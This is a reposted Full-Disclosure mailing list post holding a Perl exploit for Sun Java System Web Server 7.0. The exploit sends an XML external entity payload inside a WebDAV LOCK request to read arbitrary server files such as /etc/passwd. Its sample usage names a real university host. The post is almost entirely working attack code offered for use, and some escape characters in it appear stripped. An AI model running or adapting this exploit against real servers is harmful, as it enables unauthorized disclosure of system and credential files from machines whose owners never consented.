Home / os / winme

sun-knockout.txt

Posted on 03 April 2010

sun-knockout.pl EXPLOiT CORRECTED, ADD AUTHEN+SSL SuPP0RT iF YOU#RE kRAD KTHX

#!/usr/bin/perl
# aNOTH3R TiP OF THE iCE-BERG ReMOTE eXPLoiT
# oO SUN MiCROSYSTEMZ - SUN JAVA SYSTEM WEB SERVER Oo
# oO REMOTE FiLE DiSCLOSURE EXPLOIT Oo
# oO BUG FOUND & EXPLOiTED BY KiNGCOPE // ISOWAREZ.DE Oo
# !! THIS EXPLOIT IS NOW PRIVATE ON FULL DISCLOSURE !!
# MAY/2010
# VERY THANKS TO LSD
#
#
# oO VERiFIED oN Oo
#
# SUN JAVA SYSTEM WEB SERVER 7.0U4 B12/02/2008 [PLatFoRMz: WiNDOWS
SERVER 2008 & SunOS 5.10]
# SHOULD GiVE YOU READABLE FiLES BY UID WEBSERVD
# [SunONE/iPLANET MAY ALSO BE EXPLOiTABLE]
# RoCKiNG tHA SuRFACE SiNCE 2003 kTHX

use IO::Socket;
use MIME::Base64;

print "//Sun Microsystems Sun Java System Web Server
";
print "//Remote File Disclosure Exploit
";
print "//by Kingcope
";
print "May/2010
";

if ($#ARGV != 2) {
print "usage: perl sunone.pl <target> <webdav directory> <file to get>
";
print "sample: perl sunone.pl lib7.berkeley.edu /dav /etc/passwd
";
exit;
}

$target = $ARGV[0];

$|=1;

$remotefile = $ARGV[2];
$folder = $ARGV[1];

$KRADXmL =
"<?xml version="1.0"?>
"
."<!DOCTYPE REMOTE [
"
."<!ENTITY RemoteX SYSTEM "$remotefile">
"
."]>
"
."<D:lockinfo xmlns:D='DAV:'>
"
."<D:lockscope><D:exclusive/></D:lockscope>
"
."<D:locktype><D:write/></D:locktype>
"
."<D:owner>
"
."<D:href>
"
."<REMOTE>
"
."<RemoteX>&RemoteX;</RemoteX>
"
."</REMOTE>
"
."</D:href>
"
."</D:owner>
"
."</D:lockinfo>
";

$sock = IO::Socket::INET->new(PeerAddr => $target,
PeerPort => '80',
Proto    => 'tcp');

print $sock "LOCK /$folder HTTP/1.1
".
"Host: $target
".
"Depth: 0
".
"Connection: close
".
"Content-Type: application/xml
Content-Length:
".length($KRADXmL)."

".
$KRADXmL;

$locktoken = "";
while(<$sock>) {
if ($_ =~ /^Lock-token:s(.*)?
/) {
$locktoken = $1;
chomp $locktoken;
}
print;
}

close($sock);

$sock = IO::Socket::INET->new(PeerAddr => $target,
PeerPort => '80',
Proto    => 'tcp');

print $sock "UNLOCK /$folder HTTP/1.1
".
"Host: $target
".
"Connection: close
".
"Lock-token: $locktoken

";

while(<$sock>) {
print;
}
close($sock);

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 

TOP